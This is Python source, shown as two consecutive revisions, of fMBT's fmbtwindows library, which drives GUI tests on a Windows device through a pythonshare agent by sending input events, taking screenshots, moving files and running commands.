self, itemId, parentId, className, text, bbox, dumpFilename)
def _intCoords(self, *args):
# TODO: relative coordinates like (0.5, 0.9)
return [int(c) for c in args[0]]
def rootItem(self):
return self._viewItems[self._itemTree["root"][0][0]]
def _dumpItem(self, viewItem):
return "id=%s cls=%s text=%s bbox=%s" % (
viewItem._itemId, repr(viewItem._className), repr(viewItem._text),
viewItem._bbox)
def _dumpTree(self, rootItem, depth=0):
l = ["%s%s" % (" " * (depth * 4), self._dumpItem(rootItem))]
for child in rootItem.children():
l.extend(self._dumpTree(child, depth+1))
return l
def dumpTree(self, rootItem=None):
"""
Returns item tree as a string
"""
if rootItem == None:
rootItem = self.rootItem()
return "\n".join(self._dumpTree(rootItem))
def __str__(self):
return "View(%s, %s items)" % (repr(self._dumpFilename), len(self._viewItems))
def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None):
foundItems = []
if count == 0: return foundItems
if searchRootItem != None:
if comparator(searchRootItem):
foundItems.append(searchRootItem)
for c in searchRootItem.children():
foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c))
else:
if searchItems:
domain = iter(searchItems)
else:
domain = self._viewItems.itervalues
for i in domain():
if comparator(i):
foundItems.append(i)
if count > 0 and len(foundItems) >= count:
break
return foundItems
def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None):
if partial:
c = lambda item: (text in item._text)
else:
c = lambda item: (text == item._text)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByClass(self, className, partial=False, count=-1, searchRootItem=None, searchItems=None):
if partial:
c = lambda item: (className in item._className)
else:
c = lambda item: (className == item._className)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByPos(self, pos, count=-1, searchRootItem=None, searchItems=None, onScreen=None):
"""
Returns list of ViewItems whose bounding box contains the position.
Parameters:
pos (pair of floats (0.0..0.1) or integers (x, y)):
coordinates that fall in the bounding box of found items.
other parameters: refer to findItems documentation.
Items are listed in ascending order based on area. They may
or may not be from the same branch in the widget hierarchy.
"""
x, y = self._intCoords(pos)
c = lambda item: (item.bbox()[0] <= x <= item.bbox()[2] and item.bbox()[1] <= y <= item.bbox()[3])
items = self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
# sort from smallest to greatest area
area_items = [((i.bbox()[2] - i.bbox()[0]) * (i.bbox()[3] - i.bbox()[1]), i) for i in items]
return [i for _, i in sorted(area_items)]
class Device(fmbtgti.GUITestInterface):
def __init__(self, connspec, password=None, screenshotSize=(None, None), **kwargs):
"""Connect to windows device under test.
Parameters:
connspec (string):
specification for connecting to a pythonshare
server that will run fmbtwindows-agent. The format is
"socket://<host>[:<port>]".
password (optional, string or None):
authenticate to pythonshare server with given
password. The default is None (no authentication).
rotateScreenshot (integer, optional)
rotate new screenshots by rotateScreenshot degrees.
Example: rotateScreenshot=-90. The default is 0 (no
rotation).
To prepare a windows device for connection, launch there
python pythonshare-server --password mysecretpwd
When not on trusted network, consider ssh port forward, for
instance.
"""
fmbtgti.GUITestInterface.__init__(self, **kwargs)
self.setConnection(WindowsConnection(connspec, password))
def existingView(self):
if self._lastView:
return self._lastView
else:
raise FMBTWindowsError("view is not available. Missing refreshView()?")
def getFile(self, remoteFilename, localFilename=None):
"""
Fetch file from the device.
Parameters:
remoteFilename (string):
file to be fetched on device
localFilename (optional, string or None):
file to be saved to local filesystem. If None,
return contents of the file without saving them.
"""
return self._conn.recvFile(remoteFilename, localFilename)
def getMatchingPaths(self, pathnamePattern):
"""
Returns list of paths matching pathnamePattern on the device.
Parameters:
pathnamePattern (string):
Pattern for matching files and directories on the device.
Example:
getMatchingPaths("c:/windows/*.ini")
Implementation runs glob.glob(pathnamePattern) on remote device.
"""
return self._conn.recvMatchingPaths(pathnamePattern)
def keyNames(self):
"""
Returns list of key names recognized by pressKey
"""
return sorted(_g_keyNames)
def pinch(self, (x, y), startDistance, endDistance,
finger1Dir=90, finger2Dir=270, movePoints=20,
duration=0.75):
"""
Pinch (open or close) on coordinates (x, y).
Parameters:
x, y (integer):
the central point of the gesture. Values in range
[0.0, 1.0] are scaled to full screen width and
height.
startDistance, endDistance (float):
distance from both finger tips to the central point
of the gesture, at the start and at the end of the
gesture. Values in range [0.0, 1.0] are scaled up to
the distance from the coordinates to the edge of the
screen. Both finger tips will reach an edge if
distance is 1.0.
finger1Dir, finger2Dir (integer, optional):
directions for finger tip movements, in range [0,
360]. 0 is to the east, 90 to the north, etc. The
defaults are 90 and 270.
movePoints (integer, optional):
number of points to which finger tips are moved
after laying them to the initial positions. The
default is 20.
duration (float, optional):
duration of the gesture in seconds, the default is 0.75.
"""
screenWidth, screenHeight = self.screenSize()
screenDiagonal = math.sqrt(screenWidth**2 + screenHeight**2)
if x == None: x = 0.5
if y == None: y = 0.5
x, y = self.intCoords((x, y))
if type(startDistance) == float and 0.0 <= startDistance <= 1.0:
startDistanceInPixels = (startDistance *
max(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
else: startDistanceInPixels = int(startDistance)
if type(endDistance) == float and 0.0 <= endDistance <= 1.0:
endDistanceInPixels = (endDistance *
max(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
else: endDistanceInPixels = int(endDistance)
finger1startX = int(x + math.cos(math.radians(finger1Dir)) * startDistanceInPixels)
finger1startY = int(y - math.sin(math.radians(finger1Dir)) * startDistanceInPixels)
finger1endX = int(x + math.cos(math.radians(finger1Dir)) * endDistanceInPixels)
finger1endY = int(y - math.sin(math.radians(finger1Dir)) * endDistanceInPixels)
finger2startX = int(x + math.cos(math.radians(finger2Dir)) * startDistanceInPixels)
finger2startY = int(y - math.sin(math.radians(finger2Dir)) * startDistanceInPixels)
finger2endX = int(x + math.cos(math.radians(finger2Dir)) * endDistanceInPixels)
finger2endY = int(y - math.sin(math.radians(finger2Dir)) * endDistanceInPixels)
self.existingConnection().sendPinch(
(finger1startX, finger1startY), (finger1endX, finger1endY),
(finger2startX, finger2startY), (finger2endX, finger2endY),
movePoints, duration)
return True
def pinchOpen(self, (x, y) = (0.5, 0.5), startDistance=0.1, endDistance=0.5, **pinchKwArgs):
"""
Make the open pinch gesture.
Parameters:
x, y (integer, optional):
the central point of the gesture, the default is in
the middle of the screen.
startDistance, endDistance (float, optional):
refer to pinch documentation. The default is 0.1 and
0.5.
for the rest of the parameters, refer to pinch documentation.
"""
return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def pinchClose(self, (x, y) = (0.5, 0.5), startDistance=0.5, endDistance=0.1, **pinchKwArgs):
"""
Make the close pinch gesture.
Parameters:
x, y (integer, optional):
the central point of the gesture, the default is in
the middle of the screen.
startDistance, endDistance (float, optional):
refer to pinch documentation. The default is 0.5 and
0.1.
rest of the parameters: refer to pinch documentation.
"""
return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def putFile(self, localFilename, remoteFilepath):
"""
Send local file to the device
Parameters:
localFilename (string):
file to be sent.
remoteFilepath (string):
destination on the device. If destination is an
existing directory, the file will be saved to the
directory with its original name. Otherwise the file
will be saved with remoteFilepath as new name.
"""
return self._conn.sendFile(localFilename, remoteFilepath)
def refreshView(self, window=None, forcedView=None):
"""
(Re)reads widgets on the top window and updates the latest view.
Parameters:
window (integer (hWnd) or string (title), optional):
read widgets from given window instead of the top window.
forcedView (View or filename, optional):
use given View object or view file instead of reading the
items from the device.
Returns View object.
"""
if forcedView != None:
if isinstance(forcedView, View):
self._lastView = forcedView
elif type(forcedView) in [str, unicode]:
self._lastView = View(forcedView,
ast.literal_eval(file(forcedView).read()))
else:
if self.screenshotDir() == None:
self.setScreenshotDir(self._screenshotDirDefault)
if self.screenshotSubdir() == None:
self.setScreenshotSubdir(self._screenshotSubdirDefault)
viewFilename = self._newScreenshotFilepath()[:-3] + "view"
viewData = self._conn.recvViewData(window)
file(viewFilename, "w").write(repr(viewData))
self._lastView = View(viewFilename, viewData)
return self._lastView
def setDisplaySize(self, size):
"""
Transform coordinates of synthesized events (like a tap) from
screenshot resolution to display input area size. By default
events are synthesized directly to screenshot coordinates.
Parameters:
size (pair of integers: (width, height)):
width and height of display in pixels. If not given,
values from EnumDisplayMonitors are used.
Returns None.
"""
width, height = size
screenWidth, screenHeight = self.screenSize()
self._conn.setScreenToDisplayCoords(
lambda x, y: (x * width / screenWidth,
y * height / screenHeight))
self._conn.setDisplayToScreenCoords(
lambda x, y: (x * screenWidth / width,
y * screenHeight / height))
def setForegroundWindow(self, window):
"""
Set a window with the title as a foreground window
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetForegroundWindow(window)
def setScreenshotSize(self, size):
"""
Force screenshots from device to use given resolution.
Overrides detected monitor resolution on device.
Parameters:
size (pair of integers: (width, height)):
width and height of screenshot.
"""
self._conn.setScreenshotSize(size)
def shell(self, command):
"""
Execute command in Windows.
Parameters:
command (string or list of strings):
command to be executed. Will be forwarded directly
to subprocess.check_output. If command is a string,
then it will be executed in subshell, otherwise without
shell.
Returns what is printed by the command.
If you wish to receive exitstatus or standard output and error
separated from command, refer to shellSOE().
"""
return self._conn.evalPython('shell(%s)' % (repr(command),))
def shellSOE(self, command, asyncStatus=None, asyncOut=None, asyncError=None):
"""
Execute command on Windows.
Parameters:
command (string or list of strings):
command to be executed. If command is a list of
string, it will be executed without shell
(subprocess.check_output with shell=False).
If command is a single-line string, it will be
executed in shell (subprocess.check_output with
shell=True).
If command is a multiline string, it will be written
to a BAT file and executed as a script.
asyncStatus (string or None)
filename (on device) to which the status of
asynchronously executed shellCommand will be
written. The default is None, that is, command will
be run synchronously, and status will be returned in
the tuple.
asyncOut (string or None)
filename (on device) to which the standard output of
asynchronously executed shellCommand will be
written. The default is None.
asyncError (string or None)
filename (on device) to which the standard error of
asynchronously executed shellCommand will be
written. The default is None.
Returns triplet: exit status, standard output and standard error
from the command.
If executing command fails, returns None, None, None.
"""
return self._conn.evalPython(
'shellSOE(%s, asyncStatus=%s, asyncOut=%s, asyncError=%s)'
% (repr(command),
repr(asyncStatus), repr(asyncOut), repr(asyncError)))
def showWindow(self, window, showCmd=SW_NORMAL):
"""
Send showCmd to window.
Parameters:
window (window title (string) or handle (integer)):
window to which the command will be sent.
showCmd (integer or string):
command to be sent. Valid commands are 0..11:
SW_HIDE, SW_NORMAL, SW_MINIMIZED, SW_MAXIMIZE,
SW_NOACTIVATE, SW_SHOW SW_MINIMIZE, SW_MINNOACTIVE,
SW_SHOWNA, SW_RESTORE, SW_DEFAULT, SW_FORCEMINIMIZE.
Returns True if the window was previously visible,
otherwise False.
Notes: calls ShowWindow in user32.dll.
"""
return self.existingConnection().sendShowWindow(window, showCmd)
def tapText(self, text, partial=False, **tapKwArgs):
"""
Find an item with given text from the latest view, and tap it.
Parameters:
partial (boolean, optional):
refer to verifyText documentation. The default is
False.
tapPos (pair of floats (x, y)):
refer to tapItem documentation.
button, long, hold, count, delayBetweenTaps (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
items = self.existingView().findItemsByText(text, partial=partial, count=1)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def topWindowProperties(self):
"""
Return properties of the top window as a dictionary
"""
return self._conn.recvTopWindowProperties()
def verifyText(self, text, partial=False):
"""
Verify that the last view has at least one item with given
text.
Parameters:
text (string):
text to be searched for in items.
partial (boolean, optional):
if True, match items if item text contains given
text, otherwise match only if item text is equal to
the given text. The default is False (exact match).
"""
assert self._lastView != None, "View required."
return self._lastView.findItemsByText(text, partial=partial, count=1) != []
def windowList(self):
"""
Return list of properties of windows (dictionaries)
Example: list window handles and titles:
for props in d.windowList():
print props["hwnd"], props["title"]
"""
return self._conn.recvWindowList()
def launchHTTPD(self):
"""
DEPRECATED, will be removed, do not use!
"""
return self._conn.evalPython("launchHTTPD()")
def stopHTTPD(self):
"""
DEPRECATED, will be removed, do not use!
"""
return self._conn.evalPython("stopHTTPD()")
def view(self):
return self._lastView
class WindowsConnection(fmbtgti.GUITestConnection):
def __init__(self, connspec, password):
fmbtgti.GUITestConnection.__init__(self)
self._screenshotSize = (None, None) # autodetect
self._agent = pythonshare.connection(connspec, password=password)
self._agent_ns = self._agent.namespace()
agentFilename = os.path.join(
os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
"fmbtwindows_agent.py")
self._agent.exec_in(self._agent_ns, file(agentFilename).read())
self.setScreenToDisplayCoords(lambda x, y: (x, y))
self.setDisplayToScreenCoords(lambda x, y: (x, y))
def setScreenshotSize(self, screenshotSize):
self._screenshotSize = screenshotSize
screenW, screenH = self._screenshotSize
inputW, inputH = self._agent.eval_in(self._agent_ns, "_mouse_input_area")
self.setScreenToDisplayCoords(
lambda x, y: (x * inputW / screenW, y * inputH / screenH))
self.setDisplayToScreenCoords(
lambda x, y: (x * screenW / inputW, y * screenH / inputH))
def execPython(self, code):
return self._agent.exec_in(self._agent_ns, code)
def evalPython(self, code):
return self._agent.eval_in(self._agent_ns, code)
def recvFile(self, remoteFilename, localFilename=None):
data = self._agent.eval_in(self._agent_ns, "file(%s, 'rb').read()" % (repr(remoteFilename),))
if localFilename:
file(localFilename, "wb").write(data)
return True
else:
return data
def sendFile(self, localFilename, remoteFilepath):
data = file(localFilename).read()
rv = self.evalPython('saveFile(%s, %s, base64.b64decode(%s))' %
(repr(os.path.basename(localFilename)),
repr(remoteFilepath),
repr(base64.b64encode(data))))
return rv
def recvMatchingPaths(self, pathnamePattern):
return self._agent.eval_in(self._agent_ns,
"glob.glob(%s)" % (repr(pathnamePattern),))
def recvScreenshot(self, filename, screenshotSize=(None, None)):
ppmfilename = filename + ".ppm"
if screenshotSize == (None, None):
screenshotSize = self._screenshotSize
width, height, zdata = self._agent.eval_in(
self._agent_ns, "screenshotZYBGR(%s)" % (repr(screenshotSize),))
data = zlib.decompress(zdata)
fmbtgti.eye4graphics.wbgr2rgb(data, width, height)
if fmbtpng != None:
file(filename, "wb").write(
fmbtpng.raw2png(data, width, height, 8, "RGB"))
else:
ppm_header = "P6\n%d %d\n%d\n" % (width, height, 255)
f = file(filename + ".ppm", "wb")
f.write(ppm_header)
f.write(data)
f.close()
_run([fmbt_config.imagemagick_convert, ppmfilename, filename], expectedExitStatus=[0])
os.remove(ppmfilename)
return True
def recvTopWindowProperties(self):
return self.evalPython("topWindowProperties()")
def recvViewData(self, window=None):
if window == None:
rv = self.evalPython("topWindowWidgets()")
elif isinstance(window, int):
rv = self.evalPython("windowWidgets(%s)" % (repr(window),))
elif isinstance(window, str) or isinstance(window, unicode):
wlist = self.evalPython("windowList()")
for w in wlist:
if w["title"] == window:
rv = self.evalPython("windowWidgets(%s)" % (repr(w["hwnd"]),))
break
else:
raise ValueError('no window with title "%s"' % (window,))
else:
raise ValueError('illegal window "%s", expected integer or string (hWnd or title)' % (window,))
return rv
def recvWindowList(self):
return self.evalPython("windowList()")
def _window2hwnd(self, window):
if isinstance(window, str) or isinstance(window, unicode):
windowList = self.recvWindowList()
hwndList = [w["hwnd"] for w in windowList if w["title"] == window]
if not hwndList:
raise ValueError('no window with title "%s"' % (title,))
hwnd = hwndList[0]
elif isinstance(window, int):
hwnd = window
else:
raise ValueError('invalid window "%s", string or integer expected' % (window,))
return hwnd
def sendSetForegroundWindow(self, window):
hwnd = self._window2hwnd(window)
return 0 != self.evalPython("ctypes.windll.user32.SetForegroundWindow(%s)" %
(repr(hwnd),))
def sendShowWindow(self, window, showCmd):
hwnd = self._window2hwnd(window)
if isinstance(showCmd, str) or isinstance(showCmd, unicode):
if showCmd in _g_showCmds:
showCmd = _g_showCmds.index(showCmd)
else:
raise ValueError('invalid showCmd: "%s"' % (showCmd,))
return 0 != self.evalPython("ctypes.windll.user32.ShowWindow(%s, %s)" %
(repr(hwnd), repr(showCmd)))
def sendType(self, text):
command = 'sendType(%s)' % (repr(text),)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPress(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKey("%s",[])' % (keyCode,)
else:
command = 'sendKey("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyDown(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyDown("%s",[])' % (keyCode,)
else:
command = 'sendKeyDown("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyUp(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyUp("%s",[])' % (keyCode,)
else:
command = 'sendKeyUp("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendTap(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTap(%s, %s)" % (x, y)
else:
command = "sendClick(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchDown(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchDown(%s, %s)" % (x, y)
else:
command = "(sendMouseMove(%s, %s), sendMouseDown(%s))" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchMove(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchMove(%s, %s)" % (x, y)
else:
command = "sendMouseMove(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchUp(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchUp(%s, %s)" % (x, y)
else:
command = "sendMouseUp(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPinch(self, *args):
self.evalPython("touchPinch%s" % (args,))
return True
def setScreenToDisplayCoords(self, screenToDisplayFunction):
self._screenToDisplay = screenToDisplayFunction
def setDisplayToScreenCoords(self, displayToScreenFunction):
self._displayToScreen = displayToScreenFunction
class FMBTWindowsError(Exception): pass
fmbtwindows: added view.save()
# fMBT, free Model Based Testing tool
# Copyright (c) 2014, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
"""
This is library implements fMBT GUITestInterface for Windows
How to setup Windows device under test
1. Install Python 2.X. (For example 2.7.)
2. Add Python to PATH, so that command "python" starts the interpreter.
3. Copy fMBT's pythonshare directory to Windows.
4. In the pythonshare directory, run "python setup.py install"
5. Run:
cd \\python27\\scripts
python pythonshare-server --interface=all --password=xxxxxxxx
How to connect to the device
import fmbtwindows
d = fmbtwindows.Device("IP-ADDRESS-OF-THE-DEVICE", password="xxxxxxxx")
"""
import ast
import base64
import fmbt
import fmbt_config
import fmbtgti
import inspect
import math
import os
import pythonshare
import shutil
import subprocess
import zlib
try:
import fmbtpng
except ImportError:
fmbtpng = None
if os.name == "nt":
_g_closeFds = False
else:
_g_closeFds = True
def _adapterLog(msg):
fmbt.adapterlog("fmbtwindows %s" % (msg,))
def _run(command, expectedExitStatus=None):
"""
Execute command in child process, return status, stdout, stderr.
"""
if type(command) == str:
shell = True
else:
shell = False
try:
p = subprocess.Popen(command, shell=shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=_g_closeFds)
if expectedExitStatus != None:
out, err = p.communicate()
else:
out, err = ('', None)
except Exception, e:
class fakeProcess(object): pass
p = fakeProcess
p.returncode = 127
out, err = ('', e)
exitStatus = p.returncode
if (expectedExitStatus != None and
exitStatus != expectedExitStatus and
exitStatus not in expectedExitStatus):
msg = "Executing %s failed. Exit status: %s, expected %s" % (
command, exitStatus, expectedExitStatus)
_adapterLog("%s\n stdout: %s\n stderr: %s\n" % (msg, out, err))
raise FMBTWindowsError(msg)
return exitStatus, out, err
_g_keyNames = [
"VK_LBUTTON", "VK_RBUTTON", "VK_CANCEL", "VK_MBUTTON",
"VK_XBUTTON1", "VK_XBUTTON2", "VK_BACK", "VK_TAB", "VK_CLEAR",
"VK_RETURN", "VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_PAUSE",
"VK_CAPITAL", "VK_KANA", "VK_HANGUL", "VK_JUNJA", "VK_FINAL",
"VK_HANJA", "VK_KANJI", "VK_ESCAPE", "VK_CONVERT", "VK_NONCONVERT",
"VK_ACCEPT", "VK_MODECHANGE", "VK_SPACE", "VK_PRIOR", "VK_NEXT",
"VK_END", "VK_HOME", "VK_LEFT", "VK_UP", "VK_RIGHT", "VK_DOWN",
"VK_SELECT", "VK_PRINT", "VK_EXECUTE", "VK_SNAPSHOT", "VK_INSERT",
"VK_DELETE", "VK_HELP", "VK_LWIN", "VK_RWIN", "VK_APPS", "VK_SLEEP",
"VK_NUMPAD0", "VK_NUMPAD1", "VK_NUMPAD2", "VK_NUMPAD3", "VK_NUMPAD4",
"VK_NUMPAD5", "VK_NUMPAD6", "VK_NUMPAD7", "VK_NUMPAD8", "VK_NUMPAD9",
"VK_MULTIPLY", "VK_ADD", "VK_SEPARATOR", "VK_SUBTRACT", "VK_DECIMAL",
"VK_DIVIDE", "VK_F1", "VK_F2", "VK_F3", "VK_F4", "VK_F5", "VK_F6",
"VK_F7", "VK_F8", "VK_F9", "VK_F10", "VK_F11", "VK_F12", "VK_F13",
"VK_F14", "VK_F15", "VK_F16", "VK_F17", "VK_F18", "VK_F19", "VK_F20",
"VK_F21", "VK_F22", "VK_F23", "VK_F24", "VK_NUMLOCK", "VK_SCROLL",
"VK_LSHIFT", "VK_RSHIFT", "VK_LCONTROL", "VK_RCONTROL", "VK_LMENU",
"VK_RMENU", "VK_BROWSER_BACK", "VK_BROWSER_FORWARD",
"VK_BROWSER_REFRESH", "VK_BROWSER_STOP", "VK_BROWSER_SEARCH",
"VK_BROWSER_FAVORITES", "VK_BROWSER_HOME", "VK_VOLUME_MUTE",
"VK_VOLUME_DOWN", "VK_VOLUME_UP", "VK_MEDIA_NEXT_TRACK",
"VK_MEDIA_PREV_TRACK", "VK_MEDIA_STOP", "VK_MEDIA_PLAY_PAUSE",
"VK_LAUNCH_MAIL", "VK_LAUNCH_MEDIA_SELECT", "VK_LAUNCH_APP1",
"VK_LAUNCH_APP2", "VK_OEM_1", "VK_OEM_PLUS", "VK_OEM_COMMA",
"VK_OEM_MINUS", "VK_OEM_PERIOD", "VK_OEM_2", "VK_OEM_3", "VK_OEM_4",
"VK_OEM_5", "VK_OEM_6", "VK_OEM_7", "VK_OEM_8", "VK_OEM_102",
"VK_PROCESSKEY", "VK_PACKET", "VK_ATTN", "VK_CRSEL", "VK_EXSEL",
"VK_EREOF", "VK_PLAY", "VK_ZOOM", "VK_PA1", "VK_OEM_CLEAR", "0", "1",
"2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F",
"G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T",
"U", "V", "W", "X", "Y", "Z"]
# ShowWindow showCmd
SW_HIDE = 0
SW_NORMAL = 1
SW_MINIMIZED = 2
SW_MAXIMIZE = 3
SW_NOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_MINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
SW_DEFAULT = 10
SW_FORCEMINIMIZE = 11
_g_showCmds = [
"SW_HIDE", "SW_NORMAL", "SW_MINIMIZED", "SW_MAXIMIZE", "SW_NOACTIVATE",
"SW_SHOW", "SW_MINIMIZE", "SW_MINNOACTIVE", "SW_SHOWNA", "SW_RESTORE",
"SW_DEFAULT", "SW_FORCEMINIMIZE"]
class ViewItem(fmbtgti.GUIItem):
def __init__(self, view, itemId, parentId, className, text, bbox, dumpFilename):
self._view = view
self._itemId = itemId
self._parentId = parentId
self._className = className
self._text = text
fmbtgti.GUIItem.__init__(self, self._className, bbox, dumpFilename)
def children(self):
return [self._view._viewItems[winfo[0]]
for winfo in self._view._itemTree[self._itemId]]
def __str__(self):
return "ViewItem(%s)" % (self._view._dumpItem(self),)
class View(object):
def __init__(self, dumpFilename, itemTree):
self._dumpFilename = dumpFilename
self._itemTree = itemTree
self._viewItems = {}
for itemId, winfoList in itemTree.iteritems():
for winfo in winfoList:
itemId, parentId, className, text, bbox = winfo
self._viewItems[itemId] = ViewItem(
self, itemId, parentId, className, text, bbox, dumpFilename)
def _intCoords(self, *args):
# TODO: relative coordinates like (0.5, 0.9)
return [int(c) for c in args[0]]
def rootItem(self):
return self._viewItems[self._itemTree["root"][0][0]]
def _dumpItem(self, viewItem):
return "id=%s cls=%s text=%s bbox=%s" % (
viewItem._itemId, repr(viewItem._className), repr(viewItem._text),
viewItem._bbox)
def _dumpTree(self, rootItem, depth=0):
l = ["%s%s" % (" " * (depth * 4), self._dumpItem(rootItem))]
for child in rootItem.children():
l.extend(self._dumpTree(child, depth+1))
return l
def dumpTree(self, rootItem=None):
"""
Returns item tree as a string
"""
if rootItem == None:
rootItem = self.rootItem()
return "\n".join(self._dumpTree(rootItem))
def __str__(self):
return "View(%s, %s items)" % (repr(self._dumpFilename), len(self._viewItems))
def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None):
foundItems = []
if count == 0: return foundItems
if searchRootItem != None:
if comparator(searchRootItem):
foundItems.append(searchRootItem)
for c in searchRootItem.children():
foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c))
else:
if searchItems:
domain = iter(searchItems)
else:
domain = self._viewItems.itervalues
for i in domain():
if comparator(i):
foundItems.append(i)
if count > 0 and len(foundItems) >= count:
break
return foundItems
def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None):
if partial:
c = lambda item: (text in item._text)
else:
c = lambda item: (text == item._text)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByClass(self, className, partial=False, count=-1, searchRootItem=None, searchItems=None):
if partial:
c = lambda item: (className in item._className)
else:
c = lambda item: (className == item._className)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByPos(self, pos, count=-1, searchRootItem=None, searchItems=None, onScreen=None):
"""
Returns list of ViewItems whose bounding box contains the position.
Parameters:
pos (pair of floats (0.0..0.1) or integers (x, y)):
coordinates that fall in the bounding box of found items.
other parameters: refer to findItems documentation.
Items are listed in ascending order based on area. They may
or may not be from the same branch in the widget hierarchy.
"""
x, y = self._intCoords(pos)
c = lambda item: (item.bbox()[0] <= x <= item.bbox()[2] and item.bbox()[1] <= y <= item.bbox()[3])
items = self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
# sort from smallest to greatest area
area_items = [((i.bbox()[2] - i.bbox()[0]) * (i.bbox()[3] - i.bbox()[1]), i) for i in items]
return [i for _, i in sorted(area_items)]
def save(self, fileOrDirName):
"""
Save view dump to a file.
"""
shutil.copy(self._dumpFilename, fileOrDirName)
class Device(fmbtgti.GUITestInterface):
def __init__(self, connspec, password=None, screenshotSize=(None, None), **kwargs):
"""Connect to windows device under test.
Parameters:
connspec (string):
specification for connecting to a pythonshare
server that will run fmbtwindows-agent. The format is
"socket://<host>[:<port>]".
password (optional, string or None):
authenticate to pythonshare server with given
password. The default is None (no authentication).
rotateScreenshot (integer, optional)
rotate new screenshots by rotateScreenshot degrees.
Example: rotateScreenshot=-90. The default is 0 (no
rotation).
To prepare a windows device for connection, launch there
python pythonshare-server --password mysecretpwd
When not on trusted network, consider ssh port forward, for
instance.
"""
fmbtgti.GUITestInterface.__init__(self, **kwargs)
self.setConnection(WindowsConnection(connspec, password))
def existingView(self):
if self._lastView:
return self._lastView
else:
raise FMBTWindowsError("view is not available. Missing refreshView()?")
def getFile(self, remoteFilename, localFilename=None):
"""
Fetch file from the device.
Parameters:
remoteFilename (string):
file to be fetched on device
localFilename (optional, string or None):
file to be saved to local filesystem. If None,
return contents of the file without saving them.
"""
return self._conn.recvFile(remoteFilename, localFilename)
def getMatchingPaths(self, pathnamePattern):
"""
Returns list of paths matching pathnamePattern on the device.
Parameters:
pathnamePattern (string):
Pattern for matching files and directories on the device.
Example:
getMatchingPaths("c:/windows/*.ini")
Implementation runs glob.glob(pathnamePattern) on remote device.
"""
return self._conn.recvMatchingPaths(pathnamePattern)
def keyNames(self):
"""
Returns list of key names recognized by pressKey
"""
return sorted(_g_keyNames)
def pinch(self, (x, y), startDistance, endDistance,
finger1Dir=90, finger2Dir=270, movePoints=20,
duration=0.75):
"""
Pinch (open or close) on coordinates (x, y).
Parameters:
x, y (integer):
the central point of the gesture. Values in range
[0.0, 1.0] are scaled to full screen width and
height.
startDistance, endDistance (float):
distance from both finger tips to the central point
of the gesture, at the start and at the end of the
gesture. Values in range [0.0, 1.0] are scaled up to
the distance from the coordinates to the edge of the
screen. Both finger tips will reach an edge if
distance is 1.0.
finger1Dir, finger2Dir (integer, optional):
directions for finger tip movements, in range [0,
360]. 0 is to the east, 90 to the north, etc. The
defaults are 90 and 270.
movePoints (integer, optional):
number of points to which finger tips are moved
after laying them to the initial positions. The
default is 20.
duration (float, optional):
duration of the gesture in seconds, the default is 0.75.
"""
screenWidth, screenHeight = self.screenSize()
screenDiagonal = math.sqrt(screenWidth**2 + screenHeight**2)
